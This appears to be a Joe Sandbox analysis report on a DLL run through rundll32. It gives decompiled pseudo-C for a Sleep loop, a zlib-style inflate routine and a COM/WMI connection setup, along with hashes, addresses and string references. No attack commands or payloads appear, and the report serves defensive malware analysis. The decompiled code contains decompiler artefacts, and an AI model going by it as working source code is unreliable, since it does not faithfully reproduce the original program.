Opcode Fuzzy Hash: 30269b090895166bbe13c55bfc90a8f6ec17342fa027b451788cb05830dff57e
Instruction Fuzzy Hash: 94515E71D84308DFDF28DBA4F8947EC77B1AB04309F54E07AEA496B252DB345A80CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000ABCF Relevance: 1.3, APIs: 1, Instructions: 50
sleepCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000ABCF(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E1000B9C1(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}

0x1000abd2
0x1000abd3
0x1000abd6
0x1000abd9
0x1000abde
0x1000abe1
0x1000abe4
0x1000abe4
0x1000abec
0x1000abf1
0x1000abf4
0x1000abf7
0x1000abfa
0x1000abfd
0x1000ac10
0x1000ac11
0x1000ac14
0x1000ac1a
0x1000ac1d
0x1000ac20
0x00000000
0x00000000
0x1000ac22
0x00000000
0x1000ac20
0x1000ac26
0x1000ac26
0x1000ac28
0x1000ac28
0x1000ac2b
0x1000ac2b
0x1000ac30
0x1000ac38
0x1000ac44

APIs

Sleep.KERNELBASE(0000000A), ref: 1000AC38

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 0c40166de47bb0dd70a3ea95c49e5e074fb2617b4ba7f5ff59f65a45c3ad187d
Instruction ID: 66f6f85122bc0b5e4dd60674b04f8dfa5216e6efcab965929a2ae1e5fa2a9f07
Opcode Fuzzy Hash: 0c40166de47bb0dd70a3ea95c49e5e074fb2617b4ba7f5ff59f65a45c3ad187d
Instruction Fuzzy Hash: C2115B31A00305AFEB04CFA9C984B99B7E8EF452A4F118569E85AEB305C374E980CB40

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1001799F Relevance: 8.1, Strings: 6, Instructions: 577
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E1001799F(void* __edi) {
				signed int _t164;
				unsigned int _t172;
				unsigned int _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				signed int _t179;
				signed int _t182;
				signed int _t184;
				unsigned int _t185;
				int _t186;
				int _t194;
				signed char _t200;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				int _t210;
				int _t222;
				signed int _t227;
				signed int _t235;
				signed int _t251;
				signed char _t252;
				unsigned int _t253;
				signed char _t254;
				signed int* _t255;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t266;
				intOrPtr _t271;
				signed char _t278;
				signed int _t279;
				char* _t280;
				signed int _t282;
				signed char _t284;
				signed int _t287;
				signed int _t291;
				int _t292;
				int _t293;
				int _t296;
				int _t298;
				int _t302;
				signed int _t305;
				signed char _t311;
				signed char _t312;
				signed char _t315;
				signed char _t316;
				signed int _t318;
				int _t319;
				int _t320;
				signed char _t322;
				int _t324;
				int _t326;
				int _t330;
				signed int _t333;
				signed char _t336;
				signed char _t337;
				signed char _t339;
				int _t341;
				signed int _t347;
				int _t349;
				intOrPtr _t350;
				intOrPtr _t351;
				unsigned int _t356;
				unsigned int _t361;
				signed int _t364;
				signed int _t365;
				intOrPtr _t367;
				void* _t368;
				intOrPtr* _t380;
				void* _t381;
				intOrPtr* _t389;
				void* _t390;
				signed int _t395;
				void* _t396;
				signed int _t397;
				void* _t403;
				void* _t405;
				intOrPtr* _t412;
				void* _t413;
				signed int _t414;
				void* _t416;
				intOrPtr* _t423;
				void* _t424;
				unsigned int _t430;
				signed int _t431;
				void* _t434;
				signed int* _t435;
				void* _t439;

				 *((intOrPtr*)(__edi + 0x56))();
				asm("pushfd");
				_t435 = _t434 - 0x40;
				asm("cld");
				_t395 = _t435[0x16];
				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
				_t164 =  *_t395;
				_t435[0xb] = _t164;
				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
				_t271 =  *((intOrPtr*)(_t395 + 0x10));
				_t251 =  *(_t395 + 0xc);
				_t435[0xf] = _t251;
				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
				_t435[4] = _t271 - 0x101 + _t251;
				_t435[2] =  *(_t367 + 0x4c);
				_t435[3] =  *(_t367 + 0x50);
				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
				_t172 =  *(_t367 + 0x28);
				_t347 =  *(_t367 + 0x34);
				_t435[0xd] = _t172;
				_t435[0xc] =  *(_t367 + 0x30);
				_t435[0xe] = _t347;
				_t430 =  *(_t367 + 0x38);
				_t252 =  *(_t367 + 0x3c);
				_t396 = _t435[0xb];
				_t278 = _t435[5];
				if(_t278 > _t396) {
					L2:
					if((_t396 & 0x00000003) != 0) {
						_t396 = _t396 + 1;
						_t278 = _t252;
						_t252 = _t252 + 8;
						_t172 = 0 << _t278;
						_t430 = _t430 | _t172;
						goto L2;
					}
					goto L4;
				} else {
					_t341 = _t278 + 0xb - _t396;
					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
					_t435 =  &(_t435[6]);
					_t278 = 0;
					_t396 =  &(_t435[7]);
					_t435[5] = _t396;
					L4:
					_t368 = _t435[0xf];
					while(1) {
						_t439 =  *0x1001f040 - 2;
						if(_t439 == 0) {
							break;
						}
						if(_t439 > 0) {
							do {
								if(_t252 <= 0xf) {
									asm("lodsw");
									_t322 = _t252;
									_t252 = _t252 + 0x10;
									_t430 = _t431 | 0 << _t322;
								}
								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
								while(1) {
									_t253 = _t252 - _t173;
									_t431 = _t430 >> _t173;
									if(_t173 == 0) {
										asm("stosb");
										goto L22;
									}
									_t356 = _t173 >> 0x10;
									_t311 = _t173;
									if((_t173 & 0x00000010) == 0) {
										if((_t173 & 0x00000040) != 0) {
											L97:
											if((_t173 & 0x00000020) == 0) {
												_t280 = "invalid literal/length code";
												_t350 = 0x1a;
											} else {
												_t280 = 0;
												_t350 = 0xb;
											}
											L101:
											_t174 = _t435[0x16];
											if(_t280 != 0) {
												 *(_t174 + 0x18) = _t280;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350;
											goto L104;
										}
										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
										continue;
									}
									_t312 = _t311 & 0x0000000f;
									if(_t312 != 0) {
										if(_t253 < _t312) {
											asm("lodsw");
											_t339 = _t253;
											_t253 = _t253 + 0x10;
											_t431 = _t431 | 0 << _t339;
											_t312 = _t339;
										}
										_t253 = _t253 - _t312;
										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
										_t431 = _t431 >> _t312;
										_t356 = _t356 + _t235;
									}
									_t435[6] = _t356;
									if(_t253 <= 0xf) {
										asm("lodsw");
										_t337 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t337;
									}
									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
									while(1) {
										_t361 = _t200 >> 0x10;
										_t253 = _t253 - _t200;
										_t431 = _t431 >> _t200;
										_t315 = _t200;
										if((_t200 & 0x00000010) != 0) {
											break;
										}
										if((_t200 & 0x00000040) != 0) {
											L96:
											_t280 = "invalid distance code";
											_t350 = 0x1a;
											goto L101;
										}
										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
									}
									_t316 = _t315 & 0x0000000f;
									if(_t316 == 0) {
										if(_t361 != 1 || _t435[0xa] == _t368) {
											L38:
											_t435[0xb] = _t396;
											_t207 = _t368 - _t435[0xa];
											if(_t207 < _t361) {
												_t208 = _t435[0xd];
												_t318 =  ~_t207;
												_t414 = _t435[0xe];
												if(_t208 < _t361) {
													L100:
													_t396 = _t435[0xb];
													_t280 = "invalid distance too far back";
													_t350 = 0x1a;
													goto L101;
												}
												_t319 = _t318 + _t361;
												if(_t435[0xc] != 0) {
													_t209 = _t435[0xc];
													if(_t319 <= _t209) {
														_t416 = _t414 + _t209 - _t319;
														_t210 = _t435[6];
														if(_t210 > _t319) {
															_t210 = memcpy(_t368, _t416, _t319);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t319 + _t319;
															_t416 = _t368 - _t361;
														}
													} else {
														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
														_t324 = _t319 - _t209;
														_t210 = _t435[6];
														if(_t210 > _t324) {
															_t210 = memcpy(_t368, _t416, _t324);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t324 + _t324;
															_t416 = _t435[0xe];
															_t326 = _t435[0xc];
															if(_t210 > _t326) {
																_t210 = memcpy(_t368, _t416, _t326);
																_t435 =  &(_t435[3]);
																_t368 = _t416 + _t326 + _t326;
																_t416 = _t368 - _t361;
															}
														}
													}
												} else {
													_t416 = _t414 + _t208 - _t319;
													_t210 = _t435[6];
													if(_t210 > _t319) {
														_t210 = memcpy(_t368, _t416, _t319);
														_t435 =  &(_t435[3]);
														_t368 = _t416 + _t319 + _t319;
														_t416 = _t368 - _t361;
													}
												}
												_t320 = _t210;
												memcpy(_t368, _t416, _t320);
												_t435 =  &(_t435[3]);
												_t368 = _t416 + _t320 + _t320;
												_t396 = _t435[0xb];
												goto L22;
											}
											_t423 = _t368 - _t361;
											_t330 = _t435[6] - 3;
											 *_t368 =  *_t423;
											_t424 = _t423 + 3;
											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
											memcpy(_t368 + 3, _t424, _t330);
											_t435 =  &(_t435[3]);
											_t368 = _t424 + _t330 + _t330;
											_t396 = _t435[0xb];
										} else {
											_t389 = _t368 - 1;
											_t222 =  *_t389;
											_t333 = _t435[6] - 3;
											 *(_t389 + 1) = _t222;
											 *(_t389 + 2) = _t222;
											 *(_t389 + 3) = _t222;
											_t390 = _t389 + 4;
											memset(_t390, _t222, _t333 << 0);
											_t435 =  &(_t435[3]);
											_t368 = _t390 + _t333;
										}
										goto L22;
									}
									if(_t253 < _t316) {
										asm("lodsw");
										_t336 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t336;
										_t316 = _t336;
									}
									_t253 = _t253 - _t316;
									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
									_t431 = _t431 >> _t316;
									_t361 = _t361 + _t227;
									goto L38;
								}
								L22:
							} while (_t435[4] > _t368 && _t435[5] > _t396);
							L104:
							if( *0x1001f040 == 2) {
								_t253 = _t431;
							}
							_t176 = _t435[0x16];
							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
							_t282 = _t253 >> 3;
							_t397 = _t396 - _t282;
							_t254 = _t253 - (_t282 << 3);
							 *(_t176 + 0xc) = _t368;
							 *(_t351 + 0x3c) = _t254;
							_t284 = _t254;
							_t255 =  &(_t435[7]);
							if(_t435[5] == _t255) {
								_t266 =  *_t176;
								_t435[5] = _t266;
								_t397 = _t397 - _t255 + _t266;
								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
							}
							 *_t176 = _t397;
							_t258 = (1 << _t284) - 1;
							if( *0x1001f040 == 2) {
								asm("psrlq mm0, mm1");
								asm("movd ebp, mm0");
								asm("emms");
							}
							 *(_t351 + 0x38) = _t431 & _t258;
							_t259 = _t435[5];
							if(_t259 <= _t397) {
								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
							} else {
								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
							}
							_t260 = _t435[4];
							if(_t260 <= _t368) {
								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
							} else {
								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
							}
							asm("popfd");
							return _t176;
						}
						_push(_t172);
						_push(_t252);
						_push(_t278);
						_push(_t347);
						asm("pushfd");
						 *_t435 =  *_t435 ^ 0x00200000;
						asm("popfd");
						asm("pushfd");
						_pop(_t364);
						_t365 = _t364 ^  *_t435;
						if(_t365 == 0) {
							L15:
							 *0x1001f040 = 3;
							L16:
							_pop(_t347);
							_pop(_t278);
							_pop(_t252);
							_pop(_t172);
							continue;
						}
						asm("cpuid");
						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
							goto L15;
						} else {
							asm("cpuid");
							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
								goto L15;
							} else {
								 *0x1001f040 = 2;
								goto L16;
							}
						}
					}
					asm("emms");
					asm("movd mm0, ebp");
					_t431 = _t252;
					asm("movd mm4, dword [esp]");
					asm("movq mm3, mm4");
					asm("movd mm5, dword [esp+0x4]");
					asm("movq mm2, mm5");
					asm("pxor mm1, mm1");
					_t253 = _t435[2];
					do {
						asm("psrlq mm0, mm1");
						if(_t431 <= 0x20) {
							asm("movd mm6, ebp");
							asm("movd mm7, dword [esi]");
							_t396 = _t396 + 4;
							asm("psllq mm7, mm6");
							_t431 = _t431 + 0x20;
							asm("por mm0, mm7");
						}
						asm("pand mm4, mm0");
						asm("movd eax, mm4");
						asm("movq mm4, mm3");
						_t173 =  *(_t253 + _t172 * 4);
						while(1) {
							_t279 = _t173 & 0x000000ff;
							asm("movd mm1, ecx");
							_t431 = _t431 - _t279;
							if(_t173 == 0) {
								break;
							}
							_t349 = _t173 >> 0x10;
							if((_t173 & 0x00000010) == 0) {
								if((_t173 & 0x00000040) != 0) {
									goto L97;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t173 =  *(_t253 + ((_t279 &  *(0x1001791c + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
								continue;
							}
							_t178 = _t173 & 0x0000000f;
							if(_t178 != 0) {
								asm("psrlq mm0, mm1");
								asm("movd mm1, eax");
								asm("movd ecx, mm0");
								_t431 = _t431 - _t178;
								_t349 = _t349 + (_t279 &  *(0x1001791c + _t178 * 4));
							}
							asm("psrlq mm0, mm1");
							if(_t431 <= 0x20) {
								asm("movd mm6, ebp");
								asm("movd mm7, dword [esi]");
								_t396 = _t396 + 4;
								asm("psllq mm7, mm6");
								_t431 = _t431 + 0x20;
								asm("por mm0, mm7");
							}
							asm("pand mm5, mm0");
							asm("movd eax, mm5");
							asm("movq mm5, mm2");
							_t179 =  *(_t435[3] + _t178 * 4);
							while(1) {
								_t287 = _t179 & 0x000000ff;
								_t253 = _t179 >> 0x10;
								_t431 = _t431 - _t287;
								asm("movd mm1, ecx");
								if((_t179 & 0x00000010) != 0) {
									break;
								}
								if((_t179 & 0x00000040) != 0) {
									goto L96;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t179 =  *(_t435[3] + ((_t287 &  *(0x1001791c + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
							}
							_t182 = _t179 & 0x0000000f;
							if(_t182 == 0) {
								if(_t253 != 1 || _t435[0xa] == _t368) {
									L76:
									_t435[0xb] = _t396;
									_t184 = _t368 - _t435[0xa];
									if(_t184 < _t253) {
										_t185 = _t435[0xd];
										_t291 =  ~_t184;
										_t403 = _t435[0xe];
										if(_t185 < _t253) {
											goto L100;
										}
										_t292 = _t291 + _t253;
										if(_t435[0xc] != 0) {
											_t186 = _t435[0xc];
											if(_t292 <= _t186) {
												_t405 = _t403 + _t186 - _t292;
												if(_t349 > _t292) {
													_t349 = _t349 - _t292;
													memcpy(_t368, _t405, _t292);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t292 + _t292;
													_t405 = _t368 - _t253;
												}
											} else {
												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
												_t296 = _t292 - _t186;
												if(_t349 > _t296) {
													_t349 = _t349 - _t296;
													memcpy(_t368, _t405, _t296);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t296 + _t296;
													_t405 = _t435[0xe];
													_t298 = _t435[0xc];
													if(_t349 > _t298) {
														_t349 = _t349 - _t298;
														memcpy(_t368, _t405, _t298);
														_t435 =  &(_t435[3]);
														_t368 = _t405 + _t298 + _t298;
														_t405 = _t368 - _t253;
													}
												}
											}
										} else {
											_t405 = _t403 + _t185 - _t292;
											if(_t349 > _t292) {
												_t349 = _t349 - _t292;
												memcpy(_t368, _t405, _t292);
												_t435 =  &(_t435[3]);
												_t368 = _t405 + _t292 + _t292;
												_t405 = _t368 - _t253;
											}
										}
										_t293 = _t349;
										_t172 = memcpy(_t368, _t405, _t293);
										_t435 =  &(_t435[3]);
										_t368 = _t405 + _t293 + _t293;
										_t396 = _t435[0xb];
										_t253 = _t435[2];
										goto L64;
									}
									_t412 = _t368 - _t253;
									_t302 = _t349 - 3;
									 *_t368 =  *_t412;
									_t413 = _t412 + 3;
									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
									_t172 = memcpy(_t368 + 3, _t413, _t302);
									_t435 =  &(_t435[3]);
									_t368 = _t413 + _t302 + _t302;
									_t396 = _t435[0xb];
									_t253 = _t435[2];
									goto L64;
								} else {
									_t380 = _t368 - 1;
									_t194 =  *_t380;
									_t305 = _t349 - 3;
									 *(_t380 + 1) = _t194;
									 *(_t380 + 2) = _t194;
									 *(_t380 + 3) = _t194;
									_t381 = _t380 + 4;
									_t172 = memset(_t381, _t194, _t305 << 0);
									_t435 =  &(_t435[3]);
									_t368 = _t381 + _t305;
									_t253 = _t435[2];
									L64:
									if(_t435[4] <= _t368) {
										goto L104;
									}
									goto L65;
								}
							}
							asm("psrlq mm0, mm1");
							asm("movd mm1, eax");
							asm("movd ecx, mm0");
							_t431 = _t431 - _t182;
							_t253 = _t253 + (_t287 &  *(0x1001791c + _t182 * 4));
							goto L76;
						}
						_t172 = _t173 >> 0x10;
						asm("stosb");
						goto L64;
						L65:
					} while (_t435[5] > _t396);
					goto L104;
				}
			}

0x1001799f
0x100179a4
0x100179a5
0x100179a8
0x100179a9
0x100179ad
0x100179b3
0x100179ba
0x100179be
0x100179c6
0x100179c9
0x100179da
0x100179de
0x100179e2
0x100179ec
0x100179f0
0x100179ff
0x10017a0d
0x10017a11
0x10017a17
0x10017a1a
0x10017a1e
0x10017a22
0x10017a26
0x10017a29
0x10017a2c
0x10017a30
0x10017a36
0x10017a5a
0x10017a60
0x10017a66
0x10017a67
0x10017a69
0x10017a6c
0x10017a6e
0x00000000
0x10017a6e
0x00000000
0x10017a38
0x10017a3b
0x10017a4e
0x10017a4e
0x10017a4e
0x10017a50
0x10017a54
0x10017a72
0x10017a72
0x10017a76
0x10017a76
0x10017a7d
0x00000000
0x00000000
0x10017a83
0x10017af0
0x10017af3
0x10017af7
0x10017af9
0x10017afb
0x10017b00
0x10017b00
0x10017b0b
0x10017b0e
0x10017b10
0x10017b12
0x10017b16
0x10017b1b
0x10017b1b
0x10017b1b
0x10017b33
0x10017b36
0x10017b3a
0x10017c36
0x10017f4a
0x10017f4c
0x10017f5a
0x10017f5f
0x10017f4e
0x10017f4e
0x10017f53
0x10017f53
0x10017f76
0x10017f76
0x10017f7c
0x10017f7e
0x10017f7e
0x10017f84
0x00000000
0x10017f84
0x10017c4c
0x00000000
0x10017c4c
0x10017b40
0x10017b43
0x10017b47
0x10017b4d
0x10017b4f
0x10017b51
0x10017b56
0x10017b58
0x10017b58
0x10017b62
0x10017b64
0x10017b66
0x10017b68
0x10017b68
0x10017b6a
0x10017b71
0x10017b75
0x10017b77
0x10017b79
0x10017b7e
0x10017b7e
0x10017b8a
0x10017b8d
0x10017b8f
0x10017b94
0x10017b96
0x10017b98
0x10017b9c
0x00000000
0x00000000
0x10017c56
0x10017f3e
0x10017f3e
0x10017f43
0x00000000
0x10017f43
0x10017c6c
0x10017c6c
0x10017ba2
0x10017ba5
0x10017c0f
0x10017bce
0x10017bce
0x10017bd4
0x10017bda
0x10017c76
0x10017c7a
0x10017c7c
0x10017c82
0x10017f66
0x10017f66
0x10017f6a
0x10017f6f
0x00000000
0x10017f6f
0x10017c88
0x10017c8f
0x10017cb5
0x10017cbb
0x10017ceb
0x10017ced
0x10017cf3
0x10017cf7
0x10017cf7
0x10017cf7
0x10017cfb
0x10017cfb
0x10017cbd
0x10017cc3
0x10017cc5
0x10017cc7
0x10017ccd
0x10017cd1
0x10017cd1
0x10017cd1
0x10017cd3
0x10017cd7
0x10017cdd
0x10017ce1
0x10017ce1
0x10017ce1
0x10017ce5
0x10017ce5
0x10017cdd
0x10017ccd
0x10017c91
0x10017c93
0x10017c95
0x10017c9b
0x10017c9f
0x10017c9f
0x10017c9f
0x10017ca3
0x10017ca3
0x10017c9b
0x10017cfd
0x10017cff
0x10017cff
0x10017cff
0x10017d01
0x00000000
0x10017d01
0x10017be6
0x10017be8
0x10017bed
0x10017bf5
0x10017bf8
0x10017bfb
0x10017c01
0x10017c01
0x10017c01
0x10017c03
0x10017c17
0x10017c17
0x10017c1c
0x10017c1e
0x10017c21
0x10017c24
0x10017c27
0x10017c2a
0x10017c2d
0x10017c2d
0x10017c2d
0x10017c2d
0x00000000
0x10017c0f
0x10017ba9
0x10017baf
0x10017bb1
0x10017bb3
0x10017bb8
0x10017bba
0x10017bba
0x10017bc4
0x10017bc6
0x10017bc8
0x10017bca
0x00000000
0x10017bca
0x10017b1c
0x10017b1c
0x10017f88
0x10017f8f
0x10017f91
0x10017f91
0x10017f93
0x10017f99
0x10017f9c
0x10017f9f
0x10017fa4
0x10017fa6
0x10017fa9
0x10017fac
0x10017fae
0x10017fb6
0x10017fba
0x10017fbc
0x10017fc0
0x10017fc8
0x10017fc8
0x10017fcc
0x10017fd5
0x10017fdd
0x10017fdf
0x10017fe2
0x10017fe5
0x10017fe5
0x10017fe9
0x10017fec
0x10017ff2
0x10018005
0x10017ff4
0x10017ff9
0x10017ff9
0x10018008
0x1001800e
0x10018027
0x10018010
0x10018018
0x10018018
0x1001802d
0x10018032
0x10018032
0x10017a85
0x10017a86
0x10017a87
0x10017a88
0x10017a89
0x10017a8d
0x10017a94
0x10017a95
0x10017a96
0x10017a97
0x10017a99
0x10017adf
0x10017adf
0x10017ae9
0x10017ae9
0x10017aea
0x10017aeb
0x10017aec
0x00000000
0x10017aec
0x10017a9d
0x10017aa5
0x00000000
0x10017ab7
0x10017abc
0x10017ac7
0x00000000
0x10017ad3
0x10017ad3
0x00000000
0x10017ad3
0x10017ac7
0x10017aa5
0x10017d0c
0x10017d0e
0x10017d11
0x10017d13
0x10017d17
0x10017d1a
0x10017d1f
0x10017d22
0x10017d25
0x10017d2c
0x10017d2c
0x10017d32
0x10017d34
0x10017d37
0x10017d3a
0x10017d3d
0x10017d40
0x10017d43
0x10017d43
0x10017d46
0x10017d49
0x10017d4c
0x10017d4f
0x10017d52
0x10017d52
0x10017d55
0x10017d58
0x10017d5c
0x00000000
0x00000000
0x10017d79
0x10017d7e
0x10017e66
0x00000000
0x00000000
0x10017e6f
0x10017e72
0x10017e7e
0x00000000
0x10017e7e
0x10017d84
0x10017d87
0x10017d89
0x10017d8c
0x10017d8f
0x10017d92
0x10017d9b
0x10017d9b
0x10017d9d
0x10017da3
0x10017da5
0x10017da8
0x10017dab
0x10017dae
0x10017db1
0x10017db4
0x10017db4
0x10017dbb
0x10017dbe
0x10017dc1
0x10017dc4
0x10017dc7
0x10017dc7
0x10017dcc
0x10017dcf
0x10017dd1
0x10017dd6
0x00000000
0x00000000
0x10017e8a
0x00000000
0x00000000
0x10017e93
0x10017e96
0x10017ea6
0x10017ea6
0x10017ddc
0x10017ddf
0x10017e3b
0x10017df5
0x10017df5
0x10017dfb
0x10017e01
0x10017eb2
0x10017eb6
0x10017eb8
0x10017ebe
0x00000000
0x00000000
0x10017ec4
0x10017ecb
0x10017eed
0x10017ef3
0x10017f1f
0x10017f23
0x10017f25
0x10017f27
0x10017f27
0x10017f27
0x10017f2b
0x10017f2b
0x10017ef5
0x10017efb
0x10017efd
0x10017f01
0x10017f03
0x10017f05
0x10017f05
0x10017f05
0x10017f07
0x10017f0b
0x10017f11
0x10017f13
0x10017f15
0x10017f15
0x10017f15
0x10017f19
0x10017f19
0x10017f11
0x10017f01
0x10017ecd
0x10017ecf
0x10017ed3
0x10017ed5
0x10017ed7
0x10017ed7
0x10017ed7
0x10017edb
0x10017edb
0x10017ed3
0x10017f2d
0x10017f2f
0x10017f2f
0x10017f2f
0x10017f31
0x10017f35
0x00000000
0x10017f35
0x10017e0b
0x10017e0d
0x10017e12
0x10017e1a
0x10017e1d
0x10017e20
0x10017e26
0x10017e26
0x10017e26
0x10017e28
0x10017e2c
0x00000000
0x10017e43
0x10017e43
0x10017e46
0x10017e48
0x10017e4b
0x10017e4e
0x10017e51
0x10017e54
0x10017e57
0x10017e57
0x10017e57
0x10017e59
0x10017d62
0x10017d66
0x00000000
0x00000000
0x00000000
0x10017d66
0x10017e3b
0x10017de1
0x10017de4
0x10017de7
0x10017dea
0x10017df3
0x00000000
0x10017df3
0x10017d5e
0x10017d61
0x00000000
0x10017d6c
0x10017d6c
0x00000000
0x10017d72

Strings

ntel, xrefs: 10017AA7
invalid literal/length code, xrefs: 10017F5A
invalid distance code, xrefs: 10017F3E
Genu, xrefs: 10017A9F
ineI, xrefs: 10017AAF
invalid distance too far back, xrefs: 10017F6A

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
API String ID: 0-3089872807
Opcode ID: 891c31732df7ee9c86fe88bae22decff034309e3cafc24a05e2a0713e93e6e3b
Instruction ID: 5938c8f960f2e2343e4500dd64128025537aebf860d0862d27eb1a5e10829eca
Opcode Fuzzy Hash: 891c31732df7ee9c86fe88bae22decff034309e3cafc24a05e2a0713e93e6e3b
Instruction Fuzzy Hash: B3121532A083468FD715DE38C49021ABBF1FF88394F558A2CE8999BB41D771ED89C781

Uniqueness

Uniqueness Score: -1.00%

Function 1000D972 Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E1000D972(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x1001d928, 0, 1, 0x1001d938, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E10009525(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x1000d97f
0x1000d982
0x1000d985
0x1000d996
0x1000d99c
0x1000d9ad
0x1000d9b5
0x1000da06
0x1000da06
0x1000da0b
0x1000da10
0x1000da10
0x1000da13
0x1000da18
0x1000da1d
0x1000da1d
0x1000da20
0x1000d9b7
0x1000d9b8
0x1000d9be
